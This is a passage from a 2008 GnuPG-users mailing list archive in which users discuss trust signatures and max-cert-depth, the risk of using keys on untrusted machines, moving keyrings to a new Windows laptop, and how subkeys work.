as signatures into account in determining validity down a chain? Is there anything out there that incorporates real chains of trust of some substantial length? Thanks for your assistance and for taking the time to read this. George -- View this message in context: http://www.nabble.com/max-cert-depth-and-%22chains-of-trust%22-in-GPG-tp17700504p17700504.html Sent from the GnuPG - User mailing list archive at Nabble.com. From dshaw at jabberwocky.com Fri Jun 6 23:45:26 2008 From: dshaw at jabberwocky.com (David Shaw) Date: Fri, 6 Jun 2008 17:45:26 -0400 Subject: max-cert-depth and "chains of trust" in GPG In-Reply-To: <17700504.post@talk.nabble.com> References: <17700504.post@talk.nabble.com> Message-ID: <20080606214526.GA1701@jabberwocky.com> On Fri, Jun 06, 2008 at 01:26:19PM -0700, bezna wrote: > However, this does not happen in GPG. Because Alice does not have access to > Bob's trust database (unless he exports it and gives it to her), she has no > way of knowing who Bob trusts and to what extent. Thus, she can only rely on > the signatures made by Bob himself to determine if a certificate is valid, > but not Bob's trusted introducers because she has no idea who they are. > > A--> B--> C--> D > Depth: 0 1 2 3 > Valid: y y y ? Correct. This is because Alice does not necessarily agree with Bob. The trust decisions are personal, and while Bob might feel that Charlie is a good signer, Alice might not. > A workaround to this problem is for Alice to fully trust Charlie (who > appears valid to her because of Bob's signature) as an introducer, thereby > validating Dale's certificate through him. Note that Alice doesn't need to > sign Dale's certificate herself to do this. Yes. > So for Alice to be able to validate a certificate through someone else's > signature, she has to personally trust that someone else; the trust can't > transfer through an intermediate. Yes. The "classic" trust model requires personal trust. > Ok, now, after all this, which I hope you understood, come the questions. Am > I understanding this correctly? Yes. > What does the max-cert-depth parameter refer to? Is that the depth of the > "chain of signatures"? Yes. > And lastly, how do all these sites and applications that trace a path > between your certificate and another person's certificate work? Based on > tracing signatures alone? Just signatures. > Is it possible to export your trust database to these servers so > they will aggregate it into one and take trust as well as signatures > into account in determining validity down a chain? No. As I noted above, the trust database is very dependent on the owner - or put another way, why should you believe my trust database is correct? > Is there anything out there that incorporates real chains of trust of some > substantial length? Yes, there is. There is a different method of signing that does basically what you are looking for here - try a "tsign" (for "trust signature"). A trust signature does the same thing as a regular signature, but also contains the trust information that would have been put in the database. Essentially, it allows you to issue a signature that says "I verified the key belongs to her, and I also trust her to make signatures on my behalf". See for some examples on how to use it. David From decouk at gmail.com Sat Jun 7 23:10:32 2008 From: decouk at gmail.com (Andre Amorim) Date: Sat, 7 Jun 2008 22:10:32 +0100 Subject: One Time Password and GnuPG Message-ID: Hello fellow, I was thinking how to make gnupg more safe when it's ruining into hostile environments. The main idea is run my Gnupg in my pen drive as a portable application. I did a quick research and I found GNUPG portable here http://portableapps.com/node/11402 And thunderbird portable and enigmail http://portableapps.com/apps/internet/thunderbird_portable Then I started thinking IF the insecure computer have a Kellogg's ? well I fund Neo's SafeKeys; http://www.aplin.com.au/?page_id=246 That is a virtual keyboard that can send to engmail the private key password without type or using the keyboard. But it still vulnerable to screenlogger's . So I was think if is possible to use some kind of One Time Password System .. Something like Perfect Paper Password ... http://www.grc.com/ppp/urlaccess.htm What do you think guys ? All the best, Andre Amorim --Gpg: 2048R/3E10FF47 -------------- next part -------------- An HTML attachment was scrubbed... URL: From rjh at sixdemonbag.org Sun Jun 8 00:35:44 2008 From: rjh at sixdemonbag.org (Robert J. Hansen) Date: Sat, 07 Jun 2008 17:35:44 -0500 Subject: One Time Password and GnuPG In-Reply-To: References: Message-ID: <484B0D40.9090307@sixdemonbag.org> Andre Amorim wrote: > What do you think guys ? Search the archives. These ideas keep on popping up time and time again, and the same answers always apply. If you don't have physical security over your hardware, you don't have anything. You cannot use GnuPG safely on a malicious machine. People keep on trying to invent complex methods that allow them to do this, but it's like trying to make water not wet or bricks not heavy. From bahamutzero8825 at gmail.com Sun Jun 8 19:22:11 2008 From: bahamutzero8825 at gmail.com (Andrew Berg) Date: Sun, 08 Jun 2008 17:22:11 +0000 Subject: One Time Password and GnuPG In-Reply-To: <484B0D40.9090307@sixdemonbag.org> References: <484B0D40.9090307@sixdemonbag.org> Message-ID: <484C1543.8090604@gmail.com> Robert J. Hansen wrote: > If you don't have physical security over your hardware, you don't have > anything. You cannot use GnuPG safely on a malicious machine Exactly. There are keyloggers (both hardware and software), screenloggers, USB drive copy programs, and a lot of other nasty stuff you'll never see coming. If the copy program picks up your key, and a keylogger or screenlogger picks up your passphrase, your key is compromised. > it's like trying to make water not wet or bricks not heavy. Bricks can be hallowed out. :P From eocsor at gmail.com Mon Jun 9 06:00:01 2008 From: eocsor at gmail.com (Roscoe) Date: Mon, 9 Jun 2008 13:30:01 +0930 Subject: One Time Password and GnuPG In-Reply-To: <484C1543.8090604@gmail.com> References: <484B0D40.9090307@sixdemonbag.org> <484C1543.8090604@gmail.com> Message-ID: Would a smartcard address this private key compromising problem? On Mon, Jun 9, 2008 at 2:52 AM, Andrew Berg wrote: > Robert J. Hansen wrote: >> >> If you don't have physical security over your hardware, you don't have >> anything. You cannot use GnuPG safely on a malicious machine > > Exactly. There are keyloggers (both hardware and software), screenloggers, > USB drive copy programs, and a lot of other nasty stuff you'll never see > coming. If the copy program picks up your key, and a keylogger or > screenlogger picks up your passphrase, your key is compromised. > >> it's like trying to make water not wet or bricks not heavy. > Bricks can be hallowed out. :P > > _______________________________________________ > Gnupg-users mailing list > Gnupg-users at gnupg.org > http://lists.gnupg.org/mailman/listinfo/gnupg-users > From wk at gnupg.org Mon Jun 9 10:34:35 2008 From: wk at gnupg.org (Werner Koch) Date: Mon, 09 Jun 2008 10:34:35 +0200 Subject: One Time Password and GnuPG In-Reply-To: (eocsor@gmail.com's message of "Mon, 9 Jun 2008 13:30:01 +0930") References: <484B0D40.9090307@sixdemonbag.org> <484C1543.8090604@gmail.com> Message-ID: <871w37gg6c.fsf@wheatstone.g10code.de> On Mon, 9 Jun 2008 06:00, eocsor at gmail.com said: > Would a smartcard address this private key compromising problem? Yes. As long as yoo keep physical control over the card. If you lost the card you better consider your key compromised. Shalom-Salam, Werner -- Die Gedanken sind frei. Auschnahme regelt ein Bundeschgesetz. From george.davidescu at gmail.com Mon Jun 9 20:30:59 2008 From: george.davidescu at gmail.com (bezna) Date: Mon, 9 Jun 2008 11:30:59 -0700 (PDT) Subject: max-cert-depth and "chains of trust" in GPG In-Reply-To: <20080606214526.GA1701@jabberwocky.com> References: <17700504.post@talk.nabble.com> <20080606214526.GA1701@jabberwocky.com> Message-ID: <17738960.post@talk.nabble.com> Dear David and GPG users, Thank you for your clarification and prompt reply. I still have some further questions. 1) On the output of the --check-trustdb command, there is a line for each level of depth in the path of signatures similar to this: gpg: depth: 3 valid: 1 signed: 0 trust: 1-, 0q, 0n, 0m, 0f, 0u What does the "trust: 1-" entry stand for? I noticed that this "-1" entry usually accompanies the last hop in the chain of signatures that has made a signature to validate another key. Similarly, I've noticed that sometimes "trust: 0-" appears. What does this mean? 2) I'm a bit confused about the tsign command. I tried setting up some test cases in which there is a chain of tsigns of the form A-->B--C-->D-->E etc., each tsign having been answered with "full trust" and "level 10" at their respective queries during the signing protocol. I was puzzled to find that the same occurred as with "regular" signatures; only those certificates which were signed by someone the owner placed trust in directly were validated, but they were given no trust values (IE their trust was "unknown"). The extra trust information encoded in the trust signature seemed to be lost to GPG, with one exception: the certificates tsigned by the owner himself. I noticed that as soon as those keys who the owner had tsigned were imported, their trust was automatically set to the value given in the tsign, rather than defaulting to "unknown" as with regular signatures. This was not the case for tsigns made further down the line from those who the owner had tsigned. Am I then to understand that trust in GPG is not transferrable, and that assigning trust can only be done directly by the owner and not delegated to others, even through tsigns? That is to say, there's no way to place confidence in the trust calls made the users whom your own trusted introducers trust, and thus have a propagation of trust down a chain? I was under the impression that the tsign was useful in a system which uses Certificate Authorities (CAs), but the mechanism behind its use is unclear to me. Could you please provide some additional clarification on how tsign is supposed to work in the grand scheme of things? And just how can another user "make a signature on your behalf"? 3) Also on the topic of tsigns, I was wondering what the trust signature levels represented, how they are useful and whether any value greater than 10 (enough to qualify for a 'T') is treated the same. Many thanks, George David Shaw wrote: > > On Fri, Jun 06, 2008 at 01:26:19PM -0700, bezna wrote: > >> However, this does not happen in GPG. Because Alice does not have access >> to >> Bob's trust database (unless he exports it and gives it to her), she has >> no >> way of knowing who Bob trusts and to what extent. Thus, she can only rely >> on >> the signatures made by Bob himself to determine if a certificate is >> valid, >> but not Bob's trusted introducers because she has no idea who they are. >> >> A--> B--> C--> D >> Depth: 0 1 2 3 >> Valid: y y y ? > > Correct. This is because Alice does not necessarily agree with Bob. > The trust decisions are personal, and while Bob might feel that > Charlie is a good signer, Alice might not. > >> A workaround to this problem is for Alice to fully trust Charlie (who >> appears valid to her because of Bob's signature) as an introducer, >> thereby >> validating Dale's certificate through him. Note that Alice doesn't need >> to >> sign Dale's certificate herself to do this. > > Yes. > >> So for Alice to be able to validate a certificate through someone else's >> signature, she has to personally trust that someone else; the trust can't >> transfer through an intermediate. > > Yes. The "classic" trust model requires personal trust. > >> Ok, now, after all this, which I hope you understood, come the questions. >> Am >> I understanding this correctly? > > Yes. > >> What does the max-cert-depth parameter refer to? Is that the depth of the >> "chain of signatures"? > > Yes. > >> And lastly, how do all these sites and applications that trace a path >> between your certificate and another person's certificate work? Based on >> tracing signatures alone? > > Just signatures. > >> Is it possible to export your trust database to these servers so >> they will aggregate it into one and take trust as well as signatures >> into account in determining validity down a chain? > > No. As I noted above, the trust database is very dependent on the > owner - or put another way, why should you believe my trust database > is correct? > >> Is there anything out there that incorporates real chains of trust of >> some >> substantial length? > > Yes, there is. There is a different method of signing that does > basically what you are looking for here - try a "tsign" (for "trust > signature"). A trust signature does the same thing as a regular > signature, but also contains the trust information that would have > been put in the database. Essentially, it allows you to issue a > signature that says "I verified the key belongs to her, and I also > trust her to make signatures on my behalf". > > See > > for some examples on how to use it. > > David > > _______________________________________________ > Gnupg-users mailing list > Gnupg-users at gnupg.org > http://lists.gnupg.org/mailman/listinfo/gnupg-users > > -- View this message in context: http://www.nabble.com/max-cert-depth-and-%22chains-of-trust%22-in-GPG-tp17700504p17738960.html Sent from the GnuPG - User mailing list archive at Nabble.com. From 210525p42015 at denstarfarm.us Tue Jun 10 01:41:54 2008 From: 210525p42015 at denstarfarm.us (RD) Date: Mon, 09 Jun 2008 19:41:54 -0400 Subject: Switching to new Windows Box Message-ID: <484DBFC2.4040409@denstarfarm.us> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 My friend uses windows. Her company is replacing her laptop. She knows how to re-install gnupg but is unsure what to copy/export and what folder to place the keys on the new box. What should I tell her or where to I point her to read (RTFM) on the web? thanks - -- Robert D. -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.9 (Darwin) iQIcBAEBCgAGBQJITb/CAAoJEM+FBuO1wKhLuU8P/REAbCbwNshuLcOyKm86P0Ch mr1+WtQVdo4EEs2AaAxqi1ef4EIrleDb+zH4aUATED3Qdt4vJJtQHcTZYTWDdf0X TAiBw0/6vQ/tVUDjUh5JLyK3PTUGNltLG6PlLO/rbHfjGnOq/coBf8ZA/orZuVbw Xm517VvC6nbJynJg4iFwC43O4bdFqp8jvdiX9KgV5OIo1ljQ/irj2i4U3096mI1T 75uJa55DyR0elkZ6oriFslqkHs7WpcjuMGi98JK7rm4IJ3InMaVCu08u8VhyRuoG zqWVsIdm64Xg2kmNXMJnJ+Tk8gnUqifXwH7Q4+xLM7UDFp7KMwyJpnJkRRb/wsgi 2063QDcdh3jZsqrrnvfiLSfX+0xRIovgPRA2xqBPUCOM+AW0wnO7WoDRbutEyOT2 kjO3HRsBSSyGrBb6FWfZizbtiYgeVeNg2eQzp9ju0Zegedk/cgPXUAUG/G3pQbYI CoFOn46ItY5L/QD03EnOLtFw8rw+yifl9DIKXheCONlDtKWQEBI8OQJJ9yGdiUg0 8pI2edrUxO9GaybwZ0sJubTztMHAaxWFO51H7CxZojrOstn5hGSex+GhcCetdz32 oeavRg8m7A2KNriIBgxZCaLFEPrkGzRQziVB6E299Q+s/S8CWtXEyNUxQsmLTTDD 3GWxNiYxQaUHFf4OuWYd =iCBL -----END PGP SIGNATURE----- From John at Mozilla-Enigmail.org Tue Jun 10 03:30:22 2008 From: John at Mozilla-Enigmail.org (John Clizbe) Date: Mon, 09 Jun 2008 20:30:22 -0500 Subject: Switching to new Windows Box In-Reply-To: <484DBFC2.4040409@denstarfarm.us> References: <484DBFC2.4040409@denstarfarm.us> Message-ID: <484DD92E.7040501@Mozilla-Enigmail.org> RD wrote: > My friend uses windows. Her company is replacing her laptop. She knows > how to re-install gnupg but is unsure what to copy/export and what > folder to place the keys on the new box. > > What should I tell her or where to I point her to read (RTFM) on the web? Copy gpg.conf (if it exists) and the three .gpg files (pubring.gpg, secring.gpg, trustdb.gpg) from %APPDATA%\GnuPG on the old machine to the new machine. %APPDATA% usually expands to (subject to any localization) C:\Documents and Settings\\Application Data Running 'gpg--version' on the old machine will tell the location of the present keys. (Home: ......) Running 'gpg--version' on the new machine will create the directory as well as show the location. -- John P. Clizbe Inet: John (a) Mozilla-Enigmail.org You can't spell fiasco without SCO. PGP/GPG KeyID: 0x608D2A10/0x18BB373A "what's the key to success?" / "two words: good decisions." "what's the key to good decisions?" / "one word: experience." "how do i get experience?" / "two words: bad decisions." "Just how do the residents of Haiku, Hawai'i hold conversations?" -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 677 bytes Desc: OpenPGP digital signature URL: From 210525p42015 at denstarfarm.us Tue Jun 10 04:14:40 2008 From: 210525p42015 at denstarfarm.us (RD) Date: Mon, 09 Jun 2008 22:14:40 -0400 Subject: Switching to new Windows Box In-Reply-To: <484DD92E.7040501@Mozilla-Enigmail.org> References: <484DBFC2.4040409@denstarfarm.us> <484DD92E.7040501@Mozilla-Enigmail.org> Message-ID: <484DE390.2090203@denstarfarm.us> John Clizbe said the following, On 6/9/08 9:30 PM: > Copy gpg.conf (if it exists) and the three .gpg files (pubring.gpg, secring.gpg, thanks John ... timely ! -- RD OS/x Leopard From sdwyer at spykes.id.au Tue Jun 10 03:54:27 2008 From: sdwyer at spykes.id.au (Simon Dwyer) Date: Tue, 10 Jun 2008 11:54:27 +1000 Subject: Confused about Sub keys. Message-ID: <1213062867.12670.11.camel@tsg001.mulawa.internal> Hi everyone, I am new to all this and have been alot of reading. One thing i cant get my head around is subkeys. I have generated a sub key with my master key and i undestand that. All the commands and thing i have been doing i have been using my master keys id... should i be actively using my sub key? or does it just use it as i talk to people? Cheers, Simon Dwyer -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 197 bytes Desc: This is a digitally signed message part URL: From faramir.cl at gmail.com Tue Jun 10 06:17:46 2008 From: faramir.cl at gmail.com (Faramir) Date: Tue, 10 Jun 2008 00:17:46 -0400 Subject: Confused about Sub keys. In-Reply-To: <1213062867.12670.11.camel@tsg001.mulawa.internal> References: <1213062867.12670.11.camel@tsg001.mulawa.internal> Message-ID: <484E006A.3090109@gmail.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Simon Dwyer escribi?: > Hi everyone, > > I am new to all this and have been alot of reading. > > One thing i cant get my head around is subkeys. I have generated a sub > key with my master key and i undestand that. All the commands and thing > i have been doing i have been using my master keys id... should i be > actively using my sub key? or does it just use it as i talk to people? Hello, and yes, I think subkeys are confusing... I am still a bit confused... Anyway, there are a few things I understood, and they are: 1.- There are keys used to sign, and other keys used for encrypt/decrypt: DSA keys can sign but not encrypt, Elgammal can encrypt but not sign. RSA can do both functions, but the function intended for it must be defined at the moment of creating the key. And that is the reason to use "key pairs", because a singe key can't do both functions. 2.- You can make a key pair using DSA-Elgammal, or RSA(sign)-RSA(encrypt). Maybe you can mix, but I am *not sure* about that. 3.- A key pair is always composed by a primary key (used to sign), and a subkey used to encrypt/decrypt. 4.- You can add more subkeys, for signing and for encrypting. But I don't have any idea about how does GnuPG chose what key is going to use... 5.- The primary key is the only key that can sign other keys. 6.- But if you have a signing subkey, and an encrypting subkey, you can use these subkeys pair to sign and encrypt... you can even export the secret keys and store them safe, then export the subkeys, delete the key, import the subkeys, and be able to do everything, except to sign other people's keys. You can revoke the subkeys, if they get compromised, and since the primary key would not be compromised, you can import it, make a new subkeys pair, and keep functioning with the same master key ID (so, you would not lose the signatures people have done to your key). 7.- If you delete a subkey used to encrypt, you won't be able to read messages sent to you encrypted for that subkey, so, if you have to revoke a subkey, do it, but never delete it. And that is all I know about the subject... So, you don't have to do anything to use your subkey, it is already being used anytime you need to encrypt/decrypt. Regards -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iQEcBAEBAgAGBQJITgBqAAoJEMV4f6PvczxAWB8H/RWpE1qesd5I13Rnj5S/2ILr mPj2SuSVKHYc5qZuLuGRxw+2gaXO8icMb91Fep58DTivvJFpat3KEkypWAPSyhH1 8pbm69l813Z1Ok+1uIaUXxEyaKQJOEnCejfp0qK+Ow7Yy+V61lBzl8shssll/Upb q5eUeaofqRdkujEOfKVdRd4KdsWS6+Giu+a+HbJiiwC5UjM5Js8qj94aFCYtXrfT b4CnYmTW89ekMz9iL51J9EBXzrkoZ4nQaLgQ875xLwsNyFjy+Cer5+j4+TziPz8j FgsV5t3AY8W7wLiMbMviiWJ0Uqv792Kjs85+qfMsDVp61jqCaX6MkBWzEBR3lQk= =zuH8 -----END PGP SIGNATURE----- From sdwyer at spykes.id.au Tue Jun 10 06:40:06 2008 From: sdwyer at spykes.id.au (Simon Dwyer) Date: Tue, 10 Jun 2008 14:40:06 +1000 Subject: Confused about Sub keys. In-Reply-To: <484E006A.3090109@gmail.com> References: <1213062867.12670.11.camel@tsg001.mulawa.internal> <484E006A.3090109@gmail.com> Message-ID: <1213072806.2027.3.camel@tsg001.mulawa.internal> That does make more sense. Still a very confusing topic. From what i gather the fact that my emails are being signed and everything seems to be working i will not worry about it too much. Hope this post helps others that come looking later with the same question. Thanks Faramir, Simon On Tue, 2008-06-10 at 00:17 -0400, Faramir wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > Simon Dwyer escribi?: > > Hi everyone, > > > > I am new to all this and have been alot of reading. > > > > One thing i cant get my head around is subkeys. I have generated a sub > > key with my master key and i undestand that. All the commands and thing > > i have been doing i have been using my master keys id... should i be > > actively using my sub key? or does it just use it as i talk to people? > > Hello, and yes, I think subkeys are confusing... I am still a bit > confused... Anyway, there are a few things I understood, and they are: > > 1.- There are keys used to sign, and other keys used for > encrypt/decrypt: DSA keys can sign but not encrypt, Elgammal can encrypt > but not sign. RSA can do both functions, but the function intended for > it must be defined at the moment of creating the key. And that is the > reason to use "key pairs", because a singe key can't do both functions. > > 2.- You can make a key pair using DSA-Elgammal, or > RSA(sign)-RSA(encrypt). Maybe you can mix, but I am *not sure* about that. > > 3.- A key pair is always composed by a primary key (used to sign), and a > subkey used to encrypt/decrypt. > > 4.- You can add more subkeys, for signing and for encrypting. But I > don't have any idea about how does GnuPG chose what key is going to use... > > 5.- The primary key is the only key that can sign other keys. > > 6.- But if you have a signing subkey, and an encrypting subkey, you can > use these subkeys pair to sign and encrypt... you can even export the > secret keys and store them safe, then export the subkeys, delete the > key, import the subkeys, and be able to do everything, except to sign > other people's keys. You can revoke the subkeys, if they get > compromised, and since the primary key would not be compromised, you can > import it, make a new subkeys pair, and keep functioning with the same > master key ID (so, you would not lose the signatures people have done to > your key). > > 7.- If you delete a subkey used to encrypt, you won't be able to read > messages sent to you encrypted for that subkey, so, if you have to > revoke a subkey, do it, but never delete it. > > And that is all I know about the subject... > > So, you don't have to do anything to use your subkey, it is already > being used anytime you need to encrypt/decrypt. > > Regards > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1.4.9 (MingW32) > Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org > > iQEcBAEBAgAGBQJITgBqAAoJEMV4f6PvczxAWB8H/RWpE1qesd5I13Rnj5S/2ILr > mPj2SuSVKHYc5qZuLuGRxw+2gaXO8icMb91Fep58DTivvJFpat3KEkypWAPSyhH1 > 8pbm69l813Z1Ok+1uIaUXxEyaKQJOEnCejfp0qK+Ow7Yy+V61lBzl8shssll/Upb > q5eUeaofqRdkujEOfKVdRd4KdsWS6+Giu+a+HbJiiwC5UjM5Js8qj94aFCYtXrfT > b4CnYmTW89ekMz9iL51J9EBXzrkoZ4nQaLgQ875xLwsNyFjy+Cer5+j4+TziPz8j > FgsV5t3AY8W7wLiMbMviiWJ0Uqv792Kjs85+qfMsDVp61jqCaX6MkBWzEBR3lQk= > =zuH8 > -----END PGP SIGNATURE----- > > _______________________________________________ > Gnupg-users mailing list > Gnupg-users at gnupg.org > http://lists.gnupg.org/mailman/listinfo/gnupg-users -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 197 bytes Desc: This is a digitally signed message part URL: From shavital at mac.com Tue Jun 10 08:32:23 2008 From: shavital at mac.com (Charly Avital) Date: Tue, 10 Jun 2008 02:32:23 -0400 Subject: Confused about Sub keys. In-Reply-To: <484E006A.3090109@gmail.com> References: <1213062867.12670.11.camel@tsg001.mulawa.internal> <484E006A.3090109@gmail.com> Message-ID: <484E1FF7.30607@mac.com> Faramir wrote the following on 6/10/08 12:17 AM: [...] > And that is the > reason to use "key pairs", because a singe key can't do both functions. The above statement is not accurate. A careful reading of is recommended. This is the Spanish version: Attention Simon Dwyer. The following keys were found on a key server: (1) Simon Luke Dwyer Simon Luke Dwyer (Technology Services Group) 1024 bit DSA key 9DA5B32F, created: 2008-06-09 (2) Simon Dwyer (SpYkEs) 1024 bit DSA key 9D826360, created: 2008-06-09 (revoked) (3) Simon Luke Dwyer (SpYkEs) 1024 bit DSA key 41494BDE, created: 2008-06-06 (revoked) Can you please confirm that key No. 1 '1024 bit DSA key 9DA5B32F, created: 2008-06-09' is the one you are or will be using, since the other two have been revoked. Thanks in advance. Charly [...] From shavital at mac.com Tue Jun 10 11:01:41 2008 From: shavital at mac.com (Charly Avital) Date: Tue, 10 Jun 2008 05:01:41 -0400 Subject: Confused about Sub keys. In-Reply-To: <484E006A.3090109@gmail.com> References: <1213062867.12670.11.camel@tsg001.mulawa.internal> <484E006A.3090109@gmail.com> Message-ID: <484E42F5.9010701@mac.com> Faramir wrote the following on 6/10/08 12:17 AM: [...] > And that is the > reason to use "key pairs", because a singe key can't do both functions. The above statement is not accurate. A careful reading of is recommended. This is the Spanish version: Attention Simon Dwyer. The following keys were found on a key server: (1) Simon Luke Dwyer Simon Luke Dwyer (Technology Services Group) 1024 bit DSA key 9DA5B32F, created: 2008-06-09 (2) Simon Dwyer (SpYkEs) 1024 bit DSA key 9D826360, created: 2008-06-09 (revoked) (3) Simon Luke Dwyer (SpYkEs) 1024 bit DSA key 41494BDE, created: 2008-06-06 (revoked) Can you please confirm that key No. 1 '1024 bit DSA key 9DA5B32F, created: 2008-06-09' is the one you are or will be using, since the other two have been revoked. Thanks in advance. Charly [...] From chd at chud.net Tue Jun 10 19:41:13 2008 From: chd at chud.net (Chris De Young) Date: Tue, 10 Jun 2008 10:41:13 -0700 Subject: Confused about Sub keys. In-Reply-To: <484E006A.3090109@gmail.com> References: <1213062867.12670.11.camel@tsg001.mulawa.internal> <484E006A.3090109@gmail.com> Message-ID: <484EBCB9.4050805@chud.net> > it must be defined at the moment of creating the key. And that is the > reason to use "key pairs", because a singe key can't do both functions. "Key pair" in most contexts actually refers to the set of public key + private key, not to key + subkey(s) -- at least that seems to be the common usage from what I've seen. Cheers, -C _______________________________________________ Gnupg-users mailing list Gnupg-users at gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 250 bytes Desc: OpenPGP digital signature URL: From shavital at mac.com Tue Jun 10 20:17:56 2008 From: shavital at mac.com (Charly Avital) Date: Tue, 10 Jun 2008 14:17:56 -0400 Subject: Confused about Sub keys. In-Reply-To: <484EBCB9.4050805@chud.net> References: <1213062867.12670.11.camel@tsg001.mulawa.internal> <484E006A.3090109@gmail.com> <484EBCB9.4050805@chud.net> Message-ID: <484EC554.2090805@mac.com> Chris De Young wrote the following on 6/10/08 1:41 PM: >> it must be defined at the moment of creating the key. And that is the >> reason to use "key pairs", because a singe key can't do both functions. > > "Key pair" in most contexts actually refers to the set of > public key + private key, not to key + subkey(s) -- at least that seems to be > the common usage from what I've seen. > > Cheers, > -C Chris, Precisely, that's how it is defined and explained in PGP and OpenPGP related documentation sites. Charly From faramir.cl at gmail.com Tue Jun 10 20:39:11 2008 From: faramir.cl at gmail.com (Faramir) Date: Tue, 10 Jun 2008 14:39:11 -0400 Subject: Confused about Sub keys. In-Reply-To: <484E1FF7.30607@mac.com> References: <1213062867.12670.11.camel@tsg001.mulawa.internal> <484E006A.3090109@gmail.com> <484E1FF7.30607@mac.com> Message-ID: <484ECA4F.7020709@gmail.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Charly Avital escribi?: > Faramir wrote the following on 6/10/08 12:17 AM: > [...] > >> And that is the >> reason to use "key pairs", because a singe key can't do both functions. > > The above statement is not accurate. > > A careful reading of is > recommended. Well, I made a mistake again... but the manual in that URL doesn't show RSA keys... and when I executed the command gpg --gen-key I get the following options: (1) DSA and ElGamal (default) (2) DSA (sign only) (5) RSA (sign only) But maybe I have messed the config file, and it is just my computer the one acting like that... Regards -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iQEcBAEBAgAGBQJITspPAAoJEMV4f6PvczxAyvsH/AyDR2RDPJN0WopgU1HjnpLP cFDaVBE/qUpB7stA9AI1LzLIRDveRjo21S+lxQk4R4L5gbcUmGvsuvY9ilTMMTwn X0geJamQBG7pI8PWD8d9bLC6DTDdC9sHUjpaUO70nNsaDEfzYe/f5UU5hgC9fKGm VP8w8w21k55yzqXPXxig+IyhkgNtY7r2yzU81fHR7XkRwrLkR/kEcQrHC52SV/VH XxXEJUhpy8NbtUTvcIYcpwKJOMozgjosOtp4ySAJTyVtcPo/GXqM9IJ0qO2jLJQQ 0M/HMgOQQg02RI1dMRIWmAs+wLE+x0t/7zDVH6Na9DThX7KU8TL2mHV4dfT6B7U= =OSbG -----END PGP SIGNATURE----- From jmoore3rd at bellsouth.net Tue Jun 10 20:52:08 2008 From: jmoore3rd at bellsouth.net (John W. Moore III) Date: Tue, 10 Jun 2008 14:52:08 -0400 Subject: Confused about Sub keys. In-Reply-To: <484ECA4F.7020709@gmail.com> References: <1213062867.12670.11.camel@tsg001.mulawa.internal> <484E006A.3090109@gmail.com> <484E1FF7.30607@mac.com> <484ECA4F.7020709@gmail.com> Message-ID: <484ECD58.8000204@bellsouth.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Faramir wrote: > Well, I made a mistake again... but the manual in that URL doesn't > show RSA keys... and when I executed the command gpg --gen-key I get the > following options: > > (1) DSA and ElGamal (default) > (2) DSA (sign only) > (5) RSA (sign only) > > But maybe I have messed the config file, and it is just my computer > the one acting like that... In order to be offered more Options than the 3 above make sure the single word/line: expert is in Your gpg.conf File. JOHN ;) Timestamp: Tuesday 10 Jun 2008, 14:51 --400 (Eastern Daylight Time) -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.5.0-svn4754: (MingW32) Comment: Public Key at: http://tinyurl.com/8cpho Comment: Gossamer Spider Web of Trust: https://www.gswot.org Comment: Homepage: http://tinyurl.com/yzhbhx iQEcBAEBCgAGBQJITs1WAAoJEBCGy9eAtCsPNssH/2dUyXVkoIT/8wVCVSw2m7jo JKgcdDCsCdNlA+NR+4JYzH1rjEwcd7mj7qqc5V4L2y9H3hoIlahPf/o7limJTbUi NXSP6LTJ/AloOag/LZjL4b4RCk2m1EAjLGvNOYIoxK0MVcWk4CpPTPrw/Iax2DLW Oifczng91m9p7fLEnKYEULIEuIPmFYIUGiuU1xsCQvYExFeZG+C04fUnaKH1T3+s L4GiaE1XPPA3yyTgE1Fnrswr4/TRaLegVxbwfqBEPPOIsWuSaSWhoCIfLozektPm P7/PSJ1Wyr49G1OP+DKbpPRCe9ZcgiEXLEuEuiFikNXL7Ujx8LBwxTgW2zqhZjY= =4sQO -----END PGP SIGNATURE----- From rjh at sixdemonbag.org Tue Jun 10 21:23:50 2008 From: rjh at sixdemonbag.org (Robert J. Hansen) Date: Tue, 10 Jun 2008 14:23:50 -0500 Subject: Confused about Sub keys. In-Reply-To: <484ECA4F.7020709@gmail.com> References: <1213062867.12670.11.camel@tsg001.mulawa.internal> <484E006A.3090109@gmail.com> <484E1FF7.30607@mac.com> <484ECA4F.7020709@gmail.com> Message-ID: <484ED4C6.306@sixdemonbag.org> Faramir wrote: > Well, I made a mistake again... but the manual in that URL doesn't > show RSA keys... and when I executed the command gpg --gen-key I get > the following options: Typing something into GnuPG and learning what it does is great: it teaches you that GnuPG tends to create different keypairs for encryption and signing. However, it doesn't teach you _why_, and it's dangerous to generalize from just that small of an example. Originally, PGP 2.6 used one keypair to do everything. OpenPGP changed it to two keypairs, one for signing and one for encrypting, for one and only one reason: Flerbage. Most technical standards committees have a lot of flerbage -- ideas that have a lot of people backing them, although there's a great diversity of opinion about why these ideas should be backed. Some people thought separate keys gave increased resistance to cryptanalysis. Some people thought separate keys were cool. Some people thought it would be good for the future extensibility of OpenPGP. Some people thought it would be good to allow people to let a signing subkey expire, while leaving the encryption subkey good for the indefinite future. Some people needed DSA, and since DSA is a sign-only algorithm they needed a separate keypair for encryption. Some people said "well, PGP 5 does it this way and we need to be compatible." Etc., etc. The upshot is "a lot of people thought it was a good idea, even though there was no clear consensus on why." Warning: it's been years and years since this discussion took place within the OpenPGP WG. While my recollection is there was no clear consensus on why it was a good idea, it would not be impossible for my memory to be in error. From sdwyer at 